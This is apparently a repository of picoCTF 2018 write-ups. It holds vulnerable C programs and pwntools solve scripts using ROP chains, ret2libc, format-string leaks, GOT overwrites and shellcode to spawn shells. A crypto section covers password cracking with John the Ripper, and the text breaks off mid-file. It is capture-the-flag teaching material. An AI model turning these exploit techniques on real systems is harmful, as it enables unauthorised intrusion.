# buffer overflow 3
Points: 450
## Category
Binary Exploitation
## Question
>It looks like Dr. Xernon added a stack canary to this [program](files/vuln) to protect against buffer overflows. Do you think you can bypass the protection and get the flag? You can find it in /problems/buffer-overflow-3_3_6bcc2aa22b2b7a4a7e3ca6b2e1194faf. [Source](files/vuln.c).
### Hint
>Maybe there's a smart way to brute-force the canary?
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Binary Exploitation/buffer overflow 3/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>
#define BUFSIZE 32
#define FLAGSIZE 64
#define CANARY_SIZE 4
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
puts(buf);
fflush(stdout);
}
char global_canary[CANARY_SIZE];
void read_canary() {
FILE *f = fopen("canary.txt","r");
if (f == NULL) {
printf("Canary is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fread(global_canary,sizeof(char),CANARY_SIZE,f);
fclose(f);
}
void vuln(){
char canary[CANARY_SIZE];
char buf[BUFSIZE];
char length[BUFSIZE];
int count;
int x = 0;
memcpy(canary,global_canary,CANARY_SIZE);
printf("How Many Bytes will You Write Into the Buffer?\n> ");
while (x<BUFSIZE) {
read(0,length+x,1);
if (length[x]=='\n') break;
x++;
}
sscanf(length,"%d",&count);
printf("Input> ");
read(0,buf,count);
if (memcmp(canary,global_canary,CANARY_SIZE)) {
printf("*** Stack Smashing Detected *** : Canary Value Corrupt!\n");
exit(-1);
}
printf("Ok... Now Where's the Flag?\n");
fflush(stdout);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
int i;
gid_t gid = getegid();
setresgid(gid, gid, gid);
read_canary();
vuln();
return 0;
}
================================================
FILE: Binary Exploitation/can-you-gets-me/README.md
================================================
# can-you-gets-me
Points: 650
## Category
Binary Exploitation
## Question
>Can you exploit the following [program](files/gets) to get a flag? You may need to think return-oriented if you want to program your way to the flag. You can find the program in /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d on the shell server. [Source](files/gets.c).
### Hint
>This is a classic gets ROP
## Solution
First, find out the padding required for the buffer overflow. Then, use a rop chain to get the flag.
ROP chain generated by [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).
Working solution [solve.py](solution/solve.py).
### Flag
`picoCTF{rOp_yOuR_wAY_tO_AnTHinG_700e9c8e}`
================================================
FILE: Binary Exploitation/can-you-gets-me/files/gets.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 16
void vuln() {
char buf[16];
printf("GIVE ME YOUR NAME!\n");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}
================================================
FILE: Binary Exploitation/can-you-gets-me/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
USER = 'Platy' # Change username accordingly.
padding = 'A' * 28
# execve generated by ROPgadget
rop_gadgets = p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
rop_gadgets += '/bin'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea064) # @ .data + 4
rop_gadgets += p32(0x080b81c6) # porop_gadgets eax ; ret
rop_gadgets += '//sh'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
rop_gadgets += p32(0x080481c9) # porop_gadgets ebx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080de955) # porop_gadgets ecx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x0806f02a) # porop_gadgets edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0806cc25) # int 0x80
exploit = padding + rop_gadgets
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
py = s.run('cd /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')
print py.recv()
py.sendline(exploit)
py.sendline('cat flag.txt')
print py.recv()
py.interactive()
================================================
FILE: Binary Exploitation/echo back/README.md
================================================
# echo back
Points: 500
## Category
Binary Exploitation
## Question
This [program](files/echoback) we found seems to have a vulnerability. Can you get a shell and retreive the flag? Connect to it with `nc 2018shell1.picoctf.com 22462`.
### Hint
>hmm, printf seems to be dangerous...
>
>You may need to modify more than one address at once.
>
>Ever heard of the Global Offset Table?
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Binary Exploitation/echo back/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
context.log_level = 'error'
echoback = ELF('./echoback')
puts_got_addr = echoback.got['puts']
system_got_addr = p32(echoback.got['system'])
payload = '%59348x%8$n'
payload += '%4095x%9$n'
print "sh;#" + p32(puts_got_addr) + p32(puts_got_addr + 2) + payload
# 0x804a020
# 0xf7e0e7e0
================================================
FILE: Binary Exploitation/echooo/README.md
================================================
# echooo
Points: 300
## Category
Binary Exploitation
## Question
>This program prints any input you give it. Can you [leak](files/echo) the flag? Connect with `nc 2018shell1.picoctf.com 46960`. [Source](files/echo.c).
### Hint
>If only the program used puts...
## Solution
A simple format string exploit.
Looking at the source code, we see that the flag is stored in the stack. All we have to do is to leak values from the stack to get the flag.
Doing some testing locally, we see that the flag starts at _%29$x_. This format simply takes the 29th argument and print it out as hex.
Since the buffer only accepts 64 bytes, we have to stagger the inputs.
```
$ python solve.py
[+] Opening connection to 2018shell1.picoctf.com on port 46960: Done
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!
> %27$x %28$x %29$x %30$x %31$x %32$x %33$x %34$x %35$x %36$x
[*] Flag Part 1: 6f636970 7b465443 6d526f66 735f7434 6e695274 615f7347 445f6552 65476e61 73753072 6237615f
> %37$x %38$x %39$x %40$x %41$x
[*] Flag Part 2: 32613463 a7d64 80487ab 1 ffe42d84
[+] Flag: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}
[*] Closed connection to 2018shell1.picoctf.com port 46960
```
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}`
================================================
FILE: Binary Exploitation/echooo/files/echo.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
char buf[64];
char flag[64];
char *flag_ptr = flag;
// Set the gid to the effective gid
gid_t gid = getegid();
setresgid(gid, gid, gid);
memset(buf, 0, sizeof(flag));
memset(buf, 0, sizeof(buf));
puts("Time to learn about Format Strings!");
puts("We will evaluate any format string you give us with printf().");
puts("See if you can get the flag!");
FILE *file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag, sizeof(flag), file);
while(1) {
printf("> ");
fgets(buf, sizeof(buf), stdin);
printf(buf);
}
return 0;
}
================================================
FILE: Binary Exploitation/echooo/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
import re
encFlag = ''
s = remote('2018shell1.picoctf.com', 46960)
stage1 = ' '.join(['%{}$x'.format(i) for i in range(27, 37)])
print s.recvuntil('>'), stage1
s.sendline(stage1)
flag1 = s.recvuntil('\n').strip()
log.info('Flag Part 1: {}'.format(flag1))
stage2 = ' '.join(['%{}$x'.format(i) for i in range(37, 42)])
print '>', stage2
s.sendline(stage2)
flag2 = s.recvuntil('\n').replace('>', '').strip()
log.info('Flag Part 2: {}'.format(flag2))
encFlag = flag1 + ' ' + flag2
flag = ''
for i in encFlag.split(' '):
flag += p32(int(i, 16))
log.success('Flag: ' + re.findall(r'(picoCTF\{.+\})', flag)[0])
================================================
FILE: Binary Exploitation/got-2-learn-libc/README.md
================================================
# got-2-learn-libc
Points: 250
## Category
Binary Exploitation
## Question
>This program gives you the address of some system calls. Can you get a shell? You can find the [program](files/vuln) in /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server. [Source](files/vuln.c).
### Hint
>try returning to systems calls to leak information
>
>don't forget you can always return back to main().
## Solution
Working solution [solve.py](solution/solve.py)
Thanks to [@LFlare](https://github.com/LFlare) for making the code compatible with ASLR
### Flag
`picoCTF{syc4al1s_4rE_uS3fUl_6319ec91}`
================================================
FILE: Binary Exploitation/got-2-learn-libc/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
char useful_string[16] = "/bin/sh"; /* Maybe this can be used to spawn a shell? */
void vuln(){
char buf[BUFSIZE];
puts("Enter a string:");
gets(buf);
puts(buf);
puts("Thanks! Exiting now...");
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Here are some useful addresses:\n");
printf("puts: %p\n", puts);
printf("fflush %p\n", fflush);
printf("read: %p\n", read);
printf("write: %p\n", write);
printf("useful_string: %p\n", useful_string);
printf("\n");
vuln();
return 0;
}
================================================
FILE: Binary Exploitation/got-2-learn-libc/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
import os.path
USER = 'Platy' # Change username accordingly.
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
if not os.path.isfile('./libc.so.6'):
s.get('/lib32/libc.so.6')
# Set contexts
context(arch='i386', os='linux')
# Load libraries
libc = ELF("./libc.so.6")
libc_read_addr = libc.symbols['read']
libc_system_addr = libc.symbols['system']
libc_exit_addr = libc.symbols['exit']
py = s.run("cd /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33; ./vuln")
py.recvuntil('\n\n')
py.recvuntil(': ')
puts_addr = int(py.readline(), 16)
py.readuntil(' ')
fflush_addr = int(py.readline(), 16)
py.readuntil(': ')
read_addr = int(py.readline(), 16)
py.readuntil(': ')
write_addr = int(py.readline(), 16)
py.readuntil(': ')
binsh_addr = int(py.readline(), 16)
log.info("/bin/sh: {}".format(hex(binsh_addr)))
# Calculate offset
libc_offset = read_addr - libc_read_addr
# Calculate libc offsets
system_addr = libc_system_addr + libc_offset
log.info("SYSTEM: {}".format(hex(system_addr)))
exit_addr = libc_exit_addr + libc_offset
log.info("EXIT: {}".format(hex(exit_addr)))
# Build payload
padding = "A" * 160
exploit = padding + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)
py.sendline(exploit)
py.sendline('echo; cat flag.txt; echo')
py.interactive()
# Close process
py.close()
================================================
FILE: Binary Exploitation/got-shell?/README.md
================================================
# got-shell?
Points: 350
## Category
Binary Exploitation
## Question
>Can you authenticate to this [service](files/auth) and get the flag? Connect to it with `nc 2018shell1.picoctf.com 54664`. [Source](files/auth.c)
### Hint
>Ever heard of the Global Offset Table?
## Solution
Overwrite the Global Offset Table to the address of the win function.
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{m4sT3r_0f_tH3_g0t_t4b1e_150b198c}`
================================================
FILE: Binary Exploitation/got-shell?/files/auth.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
void win() {
system("/bin/sh");
}
int main(int argc, char **argv) {
setvbuf(stdout, NULL, _IONBF, 0);
char buf[256];
unsigned int address;
unsigned int value;
puts("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?");
scanf("%x", &address);
sprintf(buf, "Okay, now what value would you like to write to 0x%x", address);
puts(buf);
scanf("%x", &value);
sprintf(buf, "Okay, writing 0x%x to 0x%x", value, address);
puts(buf);
*(unsigned int *)address = value;
puts("Okay, exiting now...\n");
exit(1);
}
================================================
FILE: Binary Exploitation/got-shell?/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
from time import sleep
auth = ELF('./auth')
got = str(hex(auth.got['exit']))
win_func = str(hex(auth.symbols['win']))
log.info('Global Offset: {}'.format(got))
log.info('Win Function: {}'.format(win_func))
s = remote('2018shell1.picoctf.com', 54664)
print s.recv()
print got
s.sendline(got)
sleep(1)
print s.recv()
s.sendline(win_func)
s.sendline('cat flag.txt')
s.interactive()
s.close()
================================================
FILE: Binary Exploitation/gps/README.md
================================================
# gps
Points: 550
## Category
Binary Exploitation
## Question
>You got really lost in the wilderness, with nothing but your trusty [gps](files/gps). Can you find your way back to a shell and get the flag? Connect with `nc 2018shell1.picoctf.com 21755`. ([Source](files/gps.c)).
### Hint
>Can you make your shellcode randomization-resistant?
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Binary Exploitation/gps/files/gps.c
================================================
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define GPS_ACCURACY 1337
typedef void (fn_t)(void);
void initialize() {
printf("GPS Initializing");
for (int i = 0; i < 10; ++i) {
usleep(300000);
printf(".");
}
printf("Done\n");
}
void acquire_satellites() {
printf("Acquiring satellites.");
for (int i = 0; i < 3; ++i) {
printf("Satellite %d", i);
for (int j = 0; j < rand() % 10; ++j) {
usleep(133700);
printf(".");
}
if (i != 3) {
printf("Done\n");
} else {
printf("Weak signal.\n");
}
}
printf("\nGPS Initialized.\n");
printf("Warning: Weak signal causing low measurement accuracy\n\n");
}
void *query_position() {
char stk;
int offset = rand() % GPS_ACCURACY - (GPS_ACCURACY / 2);
void *ret = &stk + offset;
return ret;
}
int main() {
setbuf(stdout, NULL);
char buffer[0x1000];
srand((unsigned) (uintptr_t) buffer);
initialize();
acquire_satellites();
printf("We need to access flag.txt.\nCurrent position: %p\n", query_position());
printf("What's your plan?\n> ");
fgets(buffer, sizeof(buffer), stdin);
fn_t *location;
printf("Where do we start?\n> ");
scanf("%p", (void**) &location);
location();
return 0;
}
================================================
FILE: Binary Exploitation/leak-me/README.md
================================================
# leak-me
Points: 200
## Category
Binary Exploitation
## Question
>Can you authenticate to this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 31045`. [Source](files/auth.c).
### Hint
>Are all the system calls being used safely?
>
>Some people can have reallllllly long names you know..
## Solution
By spamming the service with multiple characters, the password from _password.txt_ gets leaked.
```
$ python -c "print 'A' * 300" | nc 2018shell1.picoctf.com 31045
What is your name?
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,a_reAllY_s3cuRe_p4s$word_d98e8d
Incorrect Password!
```
Now we can enter in a name and the password obtained.
```
$ nc 2018shell1.picoctf.com 31045
What is your name?
Platy
Hello Platy,
Please Enter the Password.
a_reAllY_s3cuRe_p4s$word_d98e8d
picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}
```
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}`
================================================
FILE: Binary Exploitation/leak-me/files/auth.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
int flag() {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag, sizeof(flag), file);
printf("%s", flag);
return 0;
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
gid_t gid = getegid();
setresgid(gid, gid, gid);
// real pw:
FILE *file;
char password[64];
char name[256];
char password_input[64];
memset(password, 0, sizeof(password));
memset(name, 0, sizeof(name));
memset(password_input, 0, sizeof(password_input));
printf("What is your name?\n");
fgets(name, sizeof(name), stdin);
char *end = strchr(name, '\n');
if (end != NULL) {
*end = '\x00';
}
strcat(name, ",\nPlease Enter the Password.");
file = fopen("password.txt", "r");
if (file == NULL) {
printf("Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(password, sizeof(password), file);
printf("Hello ");
puts(name);
fgets(password_input, sizeof(password_input), stdin);
password_input[sizeof(password_input)] = '\x00';
if (!strcmp(password_input, password)) {
flag();
}
else {
printf("Incorrect Password!\n");
}
return 0;
}
================================================
FILE: Binary Exploitation/leak-me/solution/solve.py
================================================
from pwn import *
import re
import time
s = remote('2018shell1.picoctf.com', 31045)
print s.recv()
s.sendline('A' * 500)
time.sleep(0.5)
pwd = s.recv()
print pwd
pwd = re.findall(r'A+,(.+)', pwd)[0].strip()
s.close()
s = remote('2018shell1.picoctf.com', 31045)
print s.recv()
s.sendline('Platy')
print s.recv()
s.sendline(pwd)
time.sleep(0.5)
print s.recv()
s.close()
================================================
FILE: Binary Exploitation/rop chain/README.md
================================================
# rop chain
Points: 350
## Category
Binary Exploitation
## Question
>Can you exploit the following [program](files/rop) and get the flag? You can findi the program in /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d on the shell server? [Source](files/rop.c).
### Hint
>Try and call the functions in the correct order!
>
>Remember, you can always call main() again!
## Solution
First we analyse the steps required to get the flag. It looks like we have to go to the _flag_ function to get the flag. But a few criterias must be met first. _win1_, _win2_ and _arg_check2_ must be set to the correct values to print the flag. There is _win_function1_ and _win_function2_ which will allow us to set these values.
At the vuln function, it calls gets, which is known for it's issues with buffer overflow exploits. We use the De Brujin sequence and calculate the offset needed. In this case, it's 28 characters.
Now, we get the addresses of both win functions and the flag function.
```asm
[0x080484d0]> s @ sym.win_function1
0x80485cb
[0x080484d0]> s @ sym.win_function2
0x80485d8
[0x080484d0]> s @ sym.flag
0x804862b
```
Since _win_function2_ and _flag_ functions both required arguments, we need a ROP gadget that pops and returns. Popping allows us to insert our own arguments inside. Then the addresses of the next function can be written, so when the program runs return, it jumps to our desired function.
To get such a gadget, we can use radare2.
```asm
[0x080484d0]> /R pop; ret;
...
...
0x08048804 c408 les ecx, [eax]
0x08048806 5b pop ebx
0x08048807 c3 ret
```
We can select _0x08048806_ as our address. It does not matter which register the value from the stack is popped to.
Now we just chain the address and get the flag.
`exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2`
Working solution [solve.py](solution/solve.py)
Recommended reads: http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-7
### Flag
`picoCTF{rOp_aInT_5o_h4Rd_R1gHt_536d67d1}`
================================================
FILE: Binary Exploitation/rop chain/files/exp
================================================
AAAAAAAAAAAAAAAAAAAAAAAAAAAA˅+
================================================
FILE: Binary Exploitation/rop chain/files/flag.txt
================================================
DID IT!
================================================
FILE: Binary Exploitation/rop chain/files/rop.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#define BUFSIZE 16
bool win1 = false;
bool win2 = false;
void win_function1() {
win1 = true;
}
void win_function2(unsigned int arg_check1) {
if (win1 && arg_check1 == 0xBAAAAAAD) {
win2 = true;
}
else if (win1) {
printf("Wrong Argument. Try Again.\n");
}
else {
printf("Nope. Try a little bit harder.\n");
}
}
void flag(unsigned int arg_check2) {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag, sizeof(flag), file);
if (win1 && win2 && arg_check2 == 0xDEADBAAD) {
printf("%s", flag);
return;
}
else if (win1 && win2) {
printf("Incorrect Argument. Remember, you can call other functions in between each win function!\n");
}
else if (win1 || win2) {
printf("Nice Try! You're Getting There!\n");
}
else {
printf("You won't get the flag that easy..\n");
}
}
void vuln() {
char buf[16];
printf("Enter your input> ");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}
================================================
FILE: Binary Exploitation/rop chain/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
USER = 'Platy' # Change username accordingly.
padding = 'A' * 28
win1_addr = p32(0x80485cb)
win2_addr = p32(0x80485d8)
flag_addr = p32(0x804862b)
pop_ret_gadget = p32(0x08048806)
arg_check1 = p32(0xBAAAAAAD)
arg_check2 = p32(0xDEADBAAD)
exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
py = s.run('cd /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d; ./rop')
print py.recv()
py.sendline(exploit)
print py.recv()
================================================
FILE: Binary Exploitation/shellcode/README.md
================================================
# shellcode
Points: 200
## Category
Binary Exploitation
## Question
>This [program](files/vuln) executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed on the shell server. [Source](files/vuln.c).
### Hint
>Maybe try writing some shellcode?
>
>You also might be able to find some good shellcode online.
## Solution
Run [solve.py](solution/solve.py)
### Flag
`picoCTF{shellc0de_w00h00_9ee0edd0}`
================================================
FILE: Binary Exploitation/shellcode/files/exploit
================================================
1Ph//shh/bin°
̀1@̀,
================================================
FILE: Binary Exploitation/shellcode/files/vuln.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter a string!");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
return 0;
}
================================================
FILE: Binary Exploitation/shellcode/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
PADDING = 164
payload = asm(shellcraft.sh())
nopsled = '\x90' * (PADDING - len(payload))
stackAddr = p32(0xffffd22c)
exploit = nopsled + payload + stackAddr
s = ssh(host='2018shell1.picoctf.com', user='Platy')
py = s.run('cd /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed; ./vuln')
print py.recv()
py.sendline(exploit)
py.sendline('cat flag.txt')
py.interactive()
s.close()
================================================
FILE: Cryptography/Crypto Warmup 1/README.md
================================================
# Crypto Warmup 1
Points: 75
## Category
Cryptography
## Question
>Crpyto can often be done by hand, here's a message you got from a friend, `llkjmlmpadkkc` with the key of `thisisalilkey`. Can you use this [table](files/table.txt) to solve it?.
### Hint
>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{HELLO}' as the flag.
>
>Please use all caps for the message.
## Solution
This uses a Vigenère Cipher. Online tool: https://planetcalc.com/2468/
1. Set Transformation to _Decrypt_
2. Set Key to _thisisalilkey_
3. Set Text to _llkjmlmpadkkc_
4. Click _CALCULATE_
Transformed text is _secretmessage_
### Flag
`picoCTF{SECRETMESSAGE}`
================================================
FILE: Cryptography/Crypto Warmup 1/files/table.txt
================================================
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+----------------------------------------------------
A | A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
B | B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
C | C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
D | D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
E | E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
F | F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
G | G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
H | H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
I | I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
J | J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
K | K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
L | L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
M | M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
N | N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
O | O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
P | P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
Q | Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
R | R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
S | S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
T | T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
U | U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
V | V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
W | W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
X | X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
Y | Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
Z | Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
================================================
FILE: Cryptography/Crypto Warmup 2/README.md
================================================
# Crypto Warmup 2
Points: 75
## Category
Cryptography
## Question
>Cryptography doesn't have to be complicated, have you ever heard of something called rot13? `cvpbPGS{guvf_vf_pelcgb!}`
### Hint
>This can be solved online if you don't want to do it by hand!
## Solution
This uses a ROT13 Cipher. Online tool: https://www.rot13.com/
Set input to _cvpbPGS{guvf_vf_pelcgb!}_
Output will be _picoCTF{this_is_crypto!}_
### Flag
`picoCTF{this_is_crypto!}`
================================================
FILE: Cryptography/HEEEEEEERE'S Johnny!/README.md
================================================
# HEEEEEEERE'S Johnny!
Points: 100
## Category
Cryptography
## Question
>Okay, so we found some important looking files on a linux computer. Maybe they can be used to get a password to the process. Connect with `nc 2018shell1.picoctf.com 5221`. Files can be found here: [passwd](files/passwd) [shadow](files/shadow).
### Hint
>If at first you don't succeed, try, try again. And again. And again.
>
>If you're not careful these kind of problems can really "rockyou".
## Solution
Do `john --wordlist=rockyou.txt shadow`
The file _rockyou.txt_ can be found from _/usr/share/wordlists/rockyou.txt.gz_.
Extract the file by doing `gzip -d rockyou.txt.gz`
Connect to service and enter in credentials to get the flag.
```
$ nc 2018shell1.picoctf.com 5221
Username: root
Password: thematrix
picoCTF{J0hn_1$_R1pp3d_289677b5}
```
### Flag
`picoCTF{J0hn_1$_R1pp3d_289677b5}`
================================================
FILE: Cryptography/HEEEEEEERE'S Johnny!/files/passwd
================================================
root:x:0:0:root:/root:/bin/bash
================================================
FILE: Cryptography/HEEEEEEERE'S Johnny!/files/shadow
================================================
root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:::
================================================
FILE: Cryptography/James Brahm Returns/README.md
================================================
# James Brahm Returns
Points: 700
## Category
Cryptography
## Question
>Dr. Xernon has finally approved an update to James Brahm's spy terminal. (Someone finally told them that ECB isn't secure.) Fortunately, CBC mode is safe! Right? Connect with `nc 2018shell1.picoctf.com 15608`. [Source](files/source.py).
### Hint
>What killed SSL3?
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Cryptography/James Brahm Returns/files/source.py
================================================
#!/usr/bin/python2 -u
from Crypto.Cipher import AES
import reuse
import random
from string import digits
import hashlib
agent_code = """flag"""
key = """key"""
def pad(message):
if len(message) % 16 == 0:
message = message + chr(16)*16
elif len(message) % 16 != 0:
message = message + chr(16 - len(message)%16)*(16 - len(message)%16)
return message
def encrypt(key, plain, IV):
cipher = AES.new( key.decode('hex'), AES.MODE_CBC, IV.decode('hex') )
return IV + cipher.encrypt(plain).encode('hex')
def decrypt(key, ciphertext, iv):
cipher = AES.new(key.decode('hex'), AES.MODE_CBC, iv.decode('hex'))
return cipher.decrypt(ciphertext.decode('hex')).encode('hex')
def verify_mac(message):
h = hashlib.sha1()
